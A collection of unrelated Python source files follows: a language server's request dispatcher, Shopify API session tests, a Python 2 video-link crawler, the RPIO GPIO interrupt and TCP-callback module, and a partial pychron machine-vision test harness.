self._jsonrpc_stream_reader = JsonRpcStreamReader(rx)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(tx)
self._check_parent_process = check_parent_process
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write,
max_workers=MAX_WORKERS)
self._dispatchers = []
self._shutdown = False
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def __getitem__(self, item):
"""Override getitem to fallback through multiple dispatchers."""
if self._shutdown and item != 'exit':
# exit is the only allowed method during shutdown
log.debug("Ignoring non-exit method during shutdown: %s", item)
raise KeyError
try:
return super(PythonLanguageServer, self).__getitem__(item)
except KeyError:
# Fallback through extra dispatchers
for dispatcher in self._dispatchers:
try:
return dispatcher[item]
except KeyError:
continue
raise KeyError()
def m_shutdown(self, **_kwargs):
self._shutdown = True
return None
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def _match_uri_to_workspace(self, uri):
workspace_uri = _utils.match_uri_to_workspace(uri, self.workspaces)
return self.workspaces.get(workspace_uri, self.workspace)
def _hook(self, hook_name, doc_uri=None, **kwargs):
"""Calls hook_name and returns a list of results from all registered handlers"""
workspace = self._match_uri_to_workspace(doc_uri)
doc = workspace.get_document(doc_uri) if doc_uri else None
hook_handlers = self.config.plugin_manager.subset_hook_caller(hook_name,
self.config.disabled_plugins)
return hook_handlers(config=self.config, workspace=workspace,
document=doc, **kwargs)
def capabilities(self):
server_capabilities = {
'codeActionProvider': False, # OFF
'codeLensProvider': None, # OFF
# 'completionProvider': None, # OFF
'completionProvider': {
'resolveProvider': False, # We know everything ahead of time
'triggerCharacters': ['.']
},
# 'documentFormattingProvider': True,
'documentFormattingProvider': False,
'documentHighlightProvider': True,
'documentRangeFormattingProvider': True,
'documentSymbolProvider': False,
'definitionProvider': True,
'executeCommandProvider': None,
# 'executeCommandProvider': {
# 'commands': flatten(self._hook('pyls_commands'))
# },
'hoverProvider': True,
'referencesProvider': True,
'renameProvider': False,
'foldingRangeProvider': True,
# 'signatureHelpProvider': {
# 'triggerCharacters': ['(', ',', '=']
# },
'signatureHelpProvider': None,
'textDocumentSync': {
'change': lsp.TextDocumentSyncKind.INCREMENTAL,
'save': {
'includeText': True,
},
'openClose': True,
},
'workspace': {
'workspaceFolders': {
'supported': False,
'changeNotifications': True
}
},
'experimental': merge(self._hook('pyls_experimental_capabilities'))
}
log.info('Server capabilities: %s', server_capabilities)
return server_capabilities
def m_initialize(self, processId=None, rootUri=None, rootPath=None,
initializationOptions=None, **_kwargs):
log.debug('Language server initialized with %s %s %s %s', processId,
rootUri, rootPath, initializationOptions)
if rootUri is None:
rootUri = uris.from_fs_path(
rootPath) if rootPath is not None else ''
self.workspaces.pop(self.root_uri, None)
self.root_uri = rootUri
self.config = config.Config(rootUri, initializationOptions or {},
processId, _kwargs.get('capabilities', {}))
self.workspace = Workspace(rootUri, self._endpoint, self.config)
self.workspaces[rootUri] = self.workspace
self._dispatchers = self._hook('pyls_dispatchers')
self._hook('pyls_initialize')
# Get our capabilities
return {'capabilities': self.capabilities()}
def m_initialized(self, **_kwargs):
self._hook('pyls_initialized')
def code_actions(self, doc_uri, range, context):
return flatten(self._hook('pyls_code_actions', doc_uri, range=range,
context=context))
def code_lens(self, doc_uri):
return flatten(self._hook('pyls_code_lens', doc_uri))
def completions(self, doc_uri, position):
completions = self._hook('pyls_completions', doc_uri, position=position)
return {
'isIncomplete': False,
'items': flatten(completions)
}
def definitions(self, doc_uri, position):
return flatten(
self._hook('pyls_definitions', doc_uri, position=position))
def document_symbols(self, doc_uri):
return flatten(self._hook('pyls_document_symbols', doc_uri))
def execute_command(self, command, arguments):
return self._hook('pyls_execute_command', command=command,
arguments=arguments)
def format_document(self, doc_uri):
return self._hook('pyls_format_document', doc_uri)
def format_range(self, doc_uri, range):
return self._hook('pyls_format_range', doc_uri, range=range)
def highlight(self, doc_uri, position):
return flatten(self._hook('pyls_document_highlight', doc_uri,
position=position)) or None
def hover(self, doc_uri, position):
return self._hook('pyls_hover', doc_uri, position=position) or {
'contents': ''}
@_utils.debounce(LINT_DEBOUNCE_S, keyed_by='doc_uri')
def lint(self, doc_uri, is_saved):
# Since we're debounced, the document may no longer be open
workspace = self._match_uri_to_workspace(doc_uri)
if doc_uri in workspace.documents:
workspace.publish_diagnostics(
doc_uri,
flatten(self._hook('pyls_lint', doc_uri, is_saved=is_saved))
)
def references(self, doc_uri, position, exclude_declaration):
return flatten(self._hook(
'pyls_references', doc_uri, position=position,
exclude_declaration=exclude_declaration
))
def rename(self, doc_uri, position, new_name):
return self._hook('pyls_rename', doc_uri, position=position,
new_name=new_name)
def signature_help(self, doc_uri, position):
return self._hook('pyls_signature_help', doc_uri, position=position)
def folding(self, doc_uri):
return flatten(self._hook('pyls_folding_range', doc_uri))
def m_text_document__did_close(self, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
workspace.rm_document(textDocument['uri'])
def m_text_document__did_open(self, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
workspace.put_document(textDocument['uri'], textDocument['text'],
version=textDocument.get('version'))
self._hook('pyls_document_did_open', textDocument['uri'])
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__did_change(self, contentChanges=None,
textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
for change in contentChanges:
workspace.update_document(
textDocument['uri'],
change,
version=textDocument.get('version')
)
self.lint(textDocument['uri'], is_saved=False)
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__code_action(self, textDocument=None, range=None,
context=None, **_kwargs):
return self.code_actions(textDocument['uri'], range, context)
def m_text_document__code_lens(self, textDocument=None, **_kwargs):
return self.code_lens(textDocument['uri'])
def m_text_document__completion(self, textDocument=None, position=None,
**_kwargs):
return self.completions(textDocument['uri'], position)
def m_text_document__definition(self, textDocument=None, position=None,
**_kwargs):
return self.definitions(textDocument['uri'], position)
def m_text_document__document_highlight(self, textDocument=None,
position=None, **_kwargs):
return self.highlight(textDocument['uri'], position)
def m_text_document__hover(self, textDocument=None, position=None,
**_kwargs):
return self.hover(textDocument['uri'], position)
def m_text_document__document_symbol(self, textDocument=None, **_kwargs):
return self.document_symbols(textDocument['uri'])
def m_text_document__formatting(self, textDocument=None, _options=None,
**_kwargs):
# For now we're ignoring formatting options.
return self.format_document(textDocument['uri'])
def m_text_document__rename(self, textDocument=None, position=None,
newName=None, **_kwargs):
return self.rename(textDocument['uri'], position, newName)
def m_text_document__folding_range(self, textDocument=None, **_kwargs):
return self.folding(textDocument['uri'])
def m_text_document__range_formatting(self, textDocument=None, range=None,
_options=None, **_kwargs):
# Again, we'll ignore formatting options for now.
return self.format_range(textDocument['uri'], range)
def m_text_document__references(self, textDocument=None, position=None,
context=None, **_kwargs):
exclude_declaration = not context['includeDeclaration']
return self.references(textDocument['uri'], position,
exclude_declaration)
def m_text_document__signature_help(self, textDocument=None, position=None,
**_kwargs):
return self.signature_help(textDocument['uri'], position)
def m_workspace__did_change_configuration(self, settings=None):
self.config.update((settings or {}).get('pyls', {}))
for workspace_uri in self.workspaces:
workspace = self.workspaces[workspace_uri]
workspace.update_config(settings)
for doc_uri in workspace.documents:
self.lint(doc_uri, is_saved=False)
def m_workspace__did_change_workspace_folders(self, event=None,
**_kwargs): # pylint: disable=too-many-locals
if event is None:
return
added = event.get('added', [])
removed = event.get('removed', [])
for removed_info in removed:
if 'uri' in removed_info:
removed_uri = removed_info['uri']
self.workspaces.pop(removed_uri, None)
for added_info in added:
if 'uri' in added_info:
added_uri = added_info['uri']
workspace_config = config.Config(
added_uri, self.config._init_opts,
self.config._process_id, self.config._capabilities)
workspace_config.update(self.config._settings)
self.workspaces[added_uri] = Workspace(
added_uri, self._endpoint, workspace_config)
root_workspace_removed = any(
removed_info['uri'] == self.root_uri for removed_info in removed)
workspace_added = len(added) > 0 and 'uri' in added[0]
if root_workspace_removed and workspace_added:
added_uri = added[0]['uri']
self.root_uri = added_uri
new_root_workspace = self.workspaces[added_uri]
self.config = new_root_workspace._config
self.workspace = new_root_workspace
elif root_workspace_removed:
# NOTE: Removing the root workspace can only happen when the server
# is closed, thus the else condition of this if can never happen.
if self.workspaces:
log.debug('Root workspace deleted!')
available_workspaces = sorted(self.workspaces)
first_workspace = available_workspaces[0]
new_root_workspace = self.workspaces[first_workspace]
self.root_uri = first_workspace
self.config = new_root_workspace._config
self.workspace = new_root_workspace
# Migrate documents that are on the root workspace and have a better
# match now
doc_uris = list(self.workspace._docs.keys())
for uri in doc_uris:
doc = self.workspace._docs.pop(uri)
new_workspace = self._match_uri_to_workspace(uri)
new_workspace._docs[uri] = doc
def m_workspace__did_change_watched_files(self, changes=None, **_kwargs):
changed_py_files = set()
config_changed = False
for d in (changes or []):
if d['uri'].endswith(PYTHON_FILE_EXTENSIONS):
changed_py_files.add(d['uri'])
elif d['uri'].endswith(CONFIG_FILEs):
config_changed = True
if config_changed:
self.config.settings.cache_clear()
elif not changed_py_files:
# Only externally changed python files and lint configs may result in changed diagnostics.
return
for workspace_uri in self.workspaces:
workspace = self.workspaces[workspace_uri]
for doc_uri in workspace.documents:
# Changes in doc_uri are already handled by m_text_document__did_save
if doc_uri not in changed_py_files:
self.lint(doc_uri, is_saved=False)
def m_workspace__execute_command(self, command=None, arguments=None):
return self.execute_command(command, arguments)
def flatten(list_of_lists):
return [item for lst in list_of_lists for item in lst]
def merge(list_of_dicts):
return {k: v for dictionary in list_of_dicts for k, v in dictionary.items()}
|
base_test.py
|
import shopify
from test.test_helper import TestCase
from pyactiveresource.activeresource import ActiveResource
from mock import patch
import threading
class BaseTest(TestCase):
@classmethod
def setUpClass(self):
shopify.ApiVersion.define_known_versions()
shopify.ApiVersion.define_version(shopify.Release("2019-04"))
self.session1 = shopify.Session("shop1.myshopify.com", "unstable", "token1")
self.session2 = shopify.Session("shop2.myshopify.com", "2019-04", "token2")
@classmethod
def tearDownClass(self):
shopify.ApiVersion.clear_defined_versions()
def setUp(self):
super(BaseTest, self).setUp()
def tearDown(self):
shopify.ShopifyResource.clear_session()
def test_activate_session_should_set_site_and_headers_for_given_session(self):
shopify.ShopifyResource.activate_session(self.session1)
self.assertIsNone(ActiveResource.site)
self.assertEqual("https://shop1.myshopify.com/admin/api/unstable", shopify.ShopifyResource.site)
self.assertEqual("https://shop1.myshopify.com/admin/api/unstable", shopify.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertEqual("token1", shopify.ShopifyResource.headers["X-Shopify-Access-Token"])
self.assertEqual("token1", shopify.Shop.headers["X-Shopify-Access-Token"])
def test_activate_session_should_set_site_given_version(self):
shopify.ShopifyResource.activate_session(self.session2)
self.assertIsNone(ActiveResource.site)
self.assertEqual("https://shop2.myshopify.com/admin/api/2019-04", shopify.ShopifyResource.site)
self.assertEqual("https://shop2.myshopify.com/admin/api/2019-04", shopify.Shop.site)
self.assertIsNone(ActiveResource.headers)
def test_clear_session_should_clear_site_and_headers_from_base(self):
shopify.ShopifyResource.activate_session(self.session1)
shopify.ShopifyResource.clear_session()
self.assertIsNone(ActiveResource.site)
self.assertIsNone(shopify.ShopifyResource.site)
self.assertIsNone(shopify.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertFalse("X-Shopify-Access-Token" in shopify.ShopifyResource.headers)
self.assertFalse("X-Shopify-Access-Token" in shopify.Shop.headers)
def test_activate_session_with_one_session_then_clearing_and_activating_with_another_session_shoul_request_to_correct_shop(
self,
):
shopify.ShopifyResource.activate_session(self.session1)
shopify.ShopifyResource.clear_session()
shopify.ShopifyResource.activate_session(self.session2)
self.assertIsNone(ActiveResource.site)
self.assertEqual("https://shop2.myshopify.com/admin/api/2019-04", shopify.ShopifyResource.site)
self.assertEqual("https://shop2.myshopify.com/admin/api/2019-04", shopify.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertEqual("token2", shopify.ShopifyResource.headers["X-Shopify-Access-Token"])
self.assertEqual("token2", shopify.Shop.headers["X-Shopify-Access-Token"])
def test_delete_should_send_custom_headers_with_request(self):
shopify.ShopifyResource.activate_session(self.session1)
org_headers = shopify.ShopifyResource.headers
shopify.ShopifyResource.set_headers({"X-Custom": "abc"})
with patch("shopify.ShopifyResource.connection.delete") as mock:
url = shopify.ShopifyResource._custom_method_collection_url("1", {})
shopify.ShopifyResource.delete("1")
mock.assert_called_with(url, {"X-Custom": "abc"})
shopify.ShopifyResource.set_headers(org_headers)
def test_headers_includes_user_agent(self):
self.assertTrue("User-Agent" in shopify.ShopifyResource.headers)
t = threading.Thread(target=lambda: self.assertTrue("User-Agent" in shopify.ShopifyResource.headers))
t.start()
t.join()
def test_headers_is_thread_safe(self):
def testFunc():
shopify.ShopifyResource.headers["X-Custom"] = "abc"
self.assertTrue("X-Custom" in shopify.ShopifyResource.headers)
t1 = threading.Thread(target=testFunc)
t1.start()
t1.join()
t2 = threading.Thread(target=lambda: self.assertFalse("X-Custom" in shopify.ShopifyResource.headers))
t2.start()
t2.join()
def test_setting_with_user_and_pass_strips_them(self):
shopify.ShopifyResource.clear_session()
self.fake(
"shop",
url="https://this-is-my-test-show.myshopify.com/admin/shop.json",
method="GET",
body=self.load_fixture("shop"),
headers={"Authorization": "Basic dXNlcjpwYXNz"},
)
API_KEY = "user"
PASSWORD = "pass"
shop_url = "https://%s:%s@this-is-my-test-show.myshopify.com/admin" % (API_KEY, PASSWORD)
shopify.ShopifyResource.set_site(shop_url)
res = shopify.Shop.current()
self.assertEqual("Apple Computers", res.name)
|
crawl.py
|
#!/usr/bin/env python2
import re
import urllib2
import httplib
from bs4 import BeautifulSoup
import dao
import string
from threading import Thread
import sys
import json
import traceback
import js2py
import downloader
def getDocSoup(url, cookie=""):
try:
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', cookie))
doc = opener.open(url).read()
except httplib.IncompleteRead, e:
doc = e.partial
return BeautifulSoup(doc, "lxml")
def compoundUrl(root, path):
if not path.startswith("http"):
urlRootIndex = root.find("/", 9)
if urlRootIndex != -1:
root = root[:urlRootIndex]
path = root + path
return path
def getVidUrl(link, url, nameExtractor, durationExtractor):
try:
vidurl = link.get("href")
error = False
if vidurl is None:
vidurl = link["u"]
name = link["t"]
durString = link["d"]
vidurl = compoundUrl(url, vidurl)
print vidurl
else:
vidurl = compoundUrl(url, vidurl)
print vidurl
name = eval(nameExtractor)
print "\tname: " + name
durString = eval(durationExtractor)
name = str(filter(lambda x: x in set(string.printable), name))
duration = int(re.sub("[^\\d]", "", durString))
print "\tduration: " + str(duration)
if duration not in range(10, 25) or dao.isBlackListed(
name.split(" ")):
print "\t--Duration/name check failed"
error = True
return {"url": str(vidurl), "error": error}
except:
print >> sys.stderr, "GU error " + vidurl
raise
def dateTagCheck(dateCheck, tagsExtractor, vidpage):
try:
error = False
tags = []
for tag in vidpage.select(tagsExtractor):
tags.append(tag.get_text())
if not eval(dateCheck) and dao.isBlackListed(tags):
print "\t--Date/tag check failed"
error = True
return error
except:
print >> sys.stderr, "DT error"
raise
def getLinks(urlid, url, linkExtractor, nameExtractor, durationExtractor, dateCheck, tagsExtractor):
try:
rootpage = getDocSoup(url)
vidlinks = eval(linkExtractor)
if len(vidlinks) == 0:
try:
cookie = js2py.eval_js(re.sub(".*<!--", "", re.sub("//-->.*", "",
rootpage.get_text().replace("document.cookie=",
"return ").replace(
"document.location.reload(true);", "").replace(
"Loading ...", ""))) + " go()")
rootpage = getDocSoup(url, cookie)
vidlinks = eval(linkExtractor)
except:
pass
if len(vidlinks) == 0:
print >> sys.stderr, "NO VIDEOS FOUND: " + url
return
except (urllib2.HTTPError, urllib2.URLError), e:
print >> sys.stderr, "GL " + type(e).__name__ + " " + str(e) + " " + url
return
for link in vidlinks:
try:
vidtest = getVidUrl(link, url, nameExtractor, durationExtractor)
vidurl = vidtest["url"]
error = vidtest["error"]
if dao.vidStatus(vidurl) == -1:
dao.addUrl(urlid, vidurl, 0 if error else 1)
else:
print "\t--Duplicate video"
except Exception, e:
print >> sys.stderr, "GL " + type(e).__name__ + " " + str(e) + " " + url
status = dao.vidStatus(url)
if status == 1:
if not dateTagCheck(dateCheck, tagsExtractor, rootpage):
print "***\t" + vidurl
else:
status = 0;
dao.addUrl(urlid, url, status + 2)
def startCrawl(urlid, url, linkExtractor, nameExtractor, durationExtractor, dateCheck, tagsExtractor):
while True:
dao.clean()
url = dao.getResumeUrl(urlid, url)
print "Starting crawl: " + url
try:
getLinks(urlid, url, linkExtractor, nameExtractor, durationExtractor, dateCheck, tagsExtractor)
except Exception, e:
print >> sys.stderr, "SC " + type(e).__name__ + " " + str(e) + " " + url
traceback.print_exc()
print "Finished crawl: " + url
if __name__ == "__main__":
threads = []
sites = dao.getSites()
threadMultiplyier = 1
try:
threadMultiplyier = int(sys.argv[1])
except IndexError:
pass
for i in range(0, threadMultiplyier):
for site in sites:
# for site in (sites[4],):
t = Thread(target=startCrawl, args=(site[0], site[1], site[2], site[3], site[4], site[5], site[6]))
t.setDaemon(True)
t.start()
threads.append(t)
running = True
while running:
running = False
for t in threads:
if t.isAlive():
running = True
break
|
_RPIO.py
|
# -*- coding: utf-8 -*-
#
# This file is part of RPIO.
#
# Copyright
#
# Copyright (C) 2013 Chris Hager <chris@linuxuser.at>
#
# License
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details at
# <http://www.gnu.org/licenses/lgpl-3.0-standalone.html>
#
# Documentation
#
# http://pythonhosted.org/RPIO
#
import socket
import select
import os.path
import time
import atexit
from logging import debug, info, warn, error
from threading import Thread
from functools import partial
from itertools import chain
import RPIO
import RPIO._GPIO as _GPIO
# Internals
_SYS_GPIO_ROOT = '/sys/class/gpio/'
_TCP_SOCKET_HOST = "0.0.0.0"
GPIO_FUNCTIONS = {0: "OUTPUT", 1: "INPUT", 4: "ALT0", 6:"ALT2", 7: "-"}
_PULL_UPDN = ("PUD_OFF", "PUD_DOWN", "PUD_UP")
def _threaded_callback(callback, *args):
"""
Internal wrapper to start a callback in threaded mode. Using the
daemon mode to not block the main thread from exiting.
"""
t = Thread(target=callback, args=args)
t.daemon = True
t.start()
def exit_handler():
""" Auto-cleanup on exit """
RPIO.stop_waiting_for_interrupts()
RPIO.cleanup_interrupts()
atexit.register(exit_handler)
class Interruptor:
"""
Object-based wrapper for interrupt management.
"""
_epoll = select.epoll()
_show_warnings = True
# Interrupt callback maps
_map_fileno_to_file = {}
_map_fileno_to_gpioid = {}
_map_fileno_to_options = {}
_map_gpioid_to_fileno = {}
_map_gpioid_to_callbacks = {}
# Keep track of created kernel interfaces for later cleanup
_gpio_kernel_interfaces_created = []
# TCP socket stuff
_tcp_client_sockets = {} # { fileno: (socket, cb) }
_tcp_server_sockets = {} # { fileno: (socket, cb) }
# Whether to continue the epoll loop or quit at next chance. You
# can manually set this to False to stop `wait_for_interrupts()`.
_is_waiting_for_interrupts = False
def add_tcp_callback(self, port, callback, threaded_callback=False):
"""
Adds a unix socket server callback, which will be invoked when values
arrive from a connected socket client. The callback must accept two
parameters, eg. ``def callback(socket, msg)``.
"""
if not callback:
raise AttributeError("No callback")
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind((_TCP_SOCKET_HOST, port))
serversocket.listen(1)
serversocket.setblocking(0)
self._epoll.register(serversocket.fileno(), select.EPOLLIN)
# Prepare the callback (wrap in Thread if needed)
cb = callback if not threaded_callback else \
partial(_threaded_callback, callback)
self._tcp_server_sockets[serversocket.fileno()] = (serversocket, cb)
debug("Socket server started at port %s and callback added." % port)
def add_interrupt_callback(self, gpio_id, callback, edge='both',
pull_up_down=_GPIO.PUD_OFF, threaded_callback=False,
debounce_timeout_ms=None):
"""
Add a callback to be executed when the value on 'gpio_id' changes to
the edge specified via the 'edge' parameter (default='both').
`pull_up_down` can be set to `RPIO.PUD_UP`, `RPIO.PUD_DOWN`, and
`RPIO.PUD_OFF`.
If `threaded_callback` is True, the callback will be started
inside a Thread.
"""
gpio_id = _GPIO.channel_to_gpio(gpio_id)
debug("Adding callback for GPIO %s" % gpio_id)
if not edge in ["falling", "rising", "both", "none"]:
raise AttributeError("'%s' is not a valid edge." % edge)
if not pull_up_down in [_GPIO.PUD_UP, _GPIO.PUD_DOWN, _GPIO.PUD_OFF]:
raise AttributeError("'%s' is not a valid pull_up_down." % edge)
# Make sure the gpio_id is valid
if not gpio_id in set(chain(RPIO.GPIO_LIST_R1, RPIO.GPIO_LIST_R2, \
RPIO.GPIO_LIST_R3)):
raise AttributeError("GPIO %s is not a valid gpio-id." % gpio_id)
# Require INPUT pin setup; and set the correct PULL_UPDN
if RPIO.gpio_function(int(gpio_id)) == RPIO.IN:
RPIO.set_pullupdn(gpio_id, pull_up_down)
else:
debug("- changing gpio function from %s to INPUT" % \
(GPIO_FUNCTIONS[RPIO.gpio_function(int(gpio_id))]))
RPIO.setup(gpio_id, RPIO.IN, pull_up_down)
# Prepare the callback (wrap in Thread if needed)
cb = callback if not threaded_callback else \
partial(_threaded_callback, callback)
# Prepare the /sys/class path of this gpio
path_gpio = "%sgpio%s/" % (_SYS_GPIO_ROOT, gpio_id)
# If initial callback for this GPIO then set everything up. Else make
# sure the edge detection is the same.
if gpio_id in self._map_gpioid_to_callbacks:
with open(path_gpio + "edge", "r") as f:
e = f.read().strip()
if e != edge:
raise AttributeError(("Cannot add callback for gpio %s:"
" edge detection '%s' not compatible with existing"
" edge detection '%s'.") % (gpio_id, edge, e))
# Check whether edge is the same, else throw Exception
debug("- kernel interface already setup for GPIO %s" % gpio_id)
self._map_gpioid_to_callbacks[gpio_id].append(cb)
else:
# If kernel interface already exists unexport first for clean setup
if os.path.exists(path_gpio):
if self._show_warnings:
warn("Kernel interface for GPIO %s already exists." % \
gpio_id)
debug("- unexporting kernel interface for GPIO %s" % gpio_id)
with open(_SYS_GPIO_ROOT + "unexport", "w") as f:
f.write("%s" % gpio_id)
time.sleep(0.1)
# Export kernel interface /sys/class/gpio/gpioN
with open(_SYS_GPIO_ROOT + "export", "w") as f:
f.write("%s" % gpio_id)
self._gpio_kernel_interfaces_created.append(gpio_id)
debug("- kernel interface exported for GPIO %s" % gpio_id)
# Configure gpio as input
with open(path_gpio + "direction", "w") as f:
f.write("in")
# Configure gpio edge detection
with open(path_gpio + "edge", "w") as f:
f.write(edge)
debug(("- kernel interface configured for GPIO %s "
"(edge='%s', pullupdn=%s)") % (gpio_id, edge, \
_PULL_UPDN[pull_up_down]))
# Open the gpio value stream and read the initial value
f = open(path_gpio + "value", 'r')
val_initial = f.read().strip()
debug("- inital gpio value: %s" % val_initial)
f.seek(0)
# Add callback info to the mapping dictionaries
self._map_fileno_to_file[f.fileno()] = f
self._map_fileno_to_gpioid[f.fileno()] = gpio_id
self._map_fileno_to_options[f.fileno()] = {
"debounce_timeout_s": debounce_timeout_ms / 1000.0 if \
debounce_timeout_ms else 0,
"interrupt_last": 0,
"edge": edge
}
self._map_gpioid_to_fileno[gpio_id] = f.fileno()
self._map_gpioid_to_callbacks[gpio_id] = [cb]
# Add to epoll
self._epoll.register(f.fileno(), select.EPOLLPRI | select.EPOLLERR)
def del_interrupt_callback(self, gpio_id):
""" Delete all interrupt callbacks from a certain gpio """
debug("- removing interrupts on gpio %s" % gpio_id)
gpio_id = _GPIO.channel_to_gpio(gpio_id)
fileno = self._map_gpioid_to_fileno[gpio_id]
# 1. Remove from epoll
self._epoll.unregister(fileno)
# 2. Cache the file
f = self._map_fileno_to_file[fileno]
# 3. Remove from maps
del self._map_fileno_to_file[fileno]
del self._map_fileno_to_gpioid[fileno]
del self._map_fileno_to_options[fileno]
del self._map_gpioid_to_fileno[gpio_id]
del self._map_gpioid_to_callbacks[gpio_id]
# 4. Close file last in case of IOError
f.close()
def _handle_interrupt(self, fileno, val):
""" Internally distributes interrupts to all attached callbacks """
val = int(val)
# Filter invalid edge values (sometimes 1 comes in when edge=falling)
edge = self._map_fileno_to_options[fileno]["edge"]
if (edge == 'rising' and val == 0) or (edge == 'falling' and val == 1):
return
# If user activated debounce for this callback, check timing now
debounce = self._map_fileno_to_options[fileno]["debounce_timeout_s"]
if debounce:
t = time.time()
t_last = self._map_fileno_to_options[fileno]["interrupt_last"]
if t - t_last < debounce:
debug("- don't start interrupt callback due to debouncing")
return
self._map_fileno_to_options[fileno]["interrupt_last"] = t
# Start the callback(s) now
gpio_id = self._map_fileno_to_gpioid[fileno]
if gpio_id in self._map_gpioid_to_callbacks:
for cb in self._map_gpioid_to_callbacks[gpio_id]:
cb(gpio_id, val)
def close_tcp_client(self, fileno):
debug("closing client socket fd %s" % fileno)
self._epoll.unregister(fileno)
socket, cb = self._tcp_client_sockets[fileno]
socket.close()
del self._tcp_client_sockets[fileno]
def wait_for_interrupts(self, epoll_timeout=1):
"""
Blocking loop to listen for GPIO interrupts and distribute them to
associated callbacks. epoll_timeout is an easy way to shutdown the
blocking function. Per default the timeout is set to 1 second; if
`_is_waiting_for_interrupts` is set to False the loop will exit.
If an exception occurs while waiting for interrupts, the interrupt
gpio interfaces will be cleaned up (/sys/class/gpio unexports). In
this case all interrupts will be reset and you'd need to add the
callbacks again before using `wait_for_interrupts(..)` again.
"""
self._is_waiting_for_interrupts = True
while self._is_waiting_for_interrupts:
events = self._epoll.poll(epoll_timeout)
for fileno, event in events:
debug("- epoll event on fd %s: %s" % (fileno, event))
if fileno in self._tcp_server_sockets:
# New client connection to socket server
serversocket, cb = self._tcp_server_sockets[fileno]
connection, address = serversocket.accept()
connection.setblocking(0)
f = connection.fileno()
self._epoll.register(f, select.EPOLLIN)
self._tcp_client_sockets[f] = (connection, cb)
elif event & select.EPOLLIN:
# Input from TCP socket
socket, cb = self._tcp_client_sockets[fileno]
content = socket.recv(1024)
if not content or not content.strip():
# No content means quitting
self.close_tcp_client(fileno)
else:
sock, cb = self._tcp_client_sockets[fileno]
cb(self._tcp_client_sockets[fileno][0], \
content.strip())
elif event & select.EPOLLHUP:
# TCP Socket Hangup
self.close_tcp_client(fileno)
elif event & select.EPOLLPRI:
# GPIO interrupts
f = self._map_fileno_to_file[fileno]
# read() is workaround for not getting new values
# with read(1)
val = f.read().strip()
f.seek(0)
self._handle_interrupt(fileno, val)
def stop_waiting_for_interrupts(self):
"""
Ends the blocking `wait_for_interrupts()` loop the next time it can,
which depends on the `epoll_timeout` (per default its 1 second).
"""
self._is_waiting_for_interrupts = False
def cleanup_interfaces(self):
"""
Removes all /sys/class/gpio/gpioN interfaces that this script created,
and deletes callback bindings. Should be used after using interrupts.
"""
debug("Cleaning up interfaces...")
for gpio_id in self._gpio_kernel_interfaces_created:
# Close the value-file and remove interrupt bindings
self.del_interrupt_callback(gpio_id)
# Remove the kernel GPIO interface
debug("- unexporting GPIO %s" % gpio_id)
with open(_SYS_GPIO_ROOT + "unexport", "w") as f:
f.write("%s" % gpio_id)
# Reset list of created interfaces
self._gpio_kernel_interfaces_created = []
def cleanup_tcpsockets(self):
"""
Closes all TCP connections and then the socket servers
"""
for fileno in self._tcp_client_sockets.keys():
self.close_tcp_client(fileno)
for fileno, items in self._tcp_server_sockets.items():
socket, cb = items
debug("- _cleanup server socket connection (fd %s)" % fileno)
self._epoll.unregister(fileno)
socket.close()
self._tcp_server_sockets = {}
def cleanup_interrupts(self):
"""
Clean up all interrupt-related sockets and interfaces. Recommended to
use before exiting your program! After this you'll need to re-add the
interrupt callbacks before waiting for interrupts again.
"""
self.cleanup_tcpsockets()
self.cleanup_interfaces()
|
mv_manager_tester.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from numpy import copy
from pyface.timer.do_later import do_later
from traits.api import Button, HasTraits
from traitsui.api import View, UItem
# from pychron.mv.machine_vision_manager import MachineVisionManager
# from pychron.mv.mv_image import MVImage
# ============= standard library imports ========================
# ============= local library imports ==========================
from traits.api import Instance
from pychron.core.helpers.logger_setup import logging_setup
from pychron.core.ui.image_editor import ImageEditor
from pychron.core.ui.thread import Thread
from pychron.image.standalone_image import FrameImage
from pychron.image.video import Video
from pychron.mv.autocenter_manager import CO2AutocenterManager
from pychron.mv.lumen_detector import LumenDetector
class TestAutocenter(HasTraits):
test1_button = Button('Test1')
display_image = Instance(FrameImage)
def init(self):
a = CO2AutocenterManager(video=Video())
# a.search_width = 1
# a.search_n = 20
# a.stretch_intensity = False
# a.blur = True
# a.blocksize = 10
# a.blocksize_step = 5
self.display_image = a.display_image
self.manager = a
def _test1(self):
print('test1')
ld = LumenDetector()
def func():
src = copy(self.manager.video.get_cached_frame())
# dim = self.stage_map.g_dimension
ld.pxpermm = 31
dim = 1.5
mask_dim = dim * 1.05
offx, offy = 0, 0
cropdim = dim * 2.5
src = ld.crop(src, cropdim, cropdim, offx, offy, verbose=False)
ld.find_targets(self.display_image, src, dim, mask=mask_dim,
search={'start_offset_scalar': 1,
# 'width': 2
})
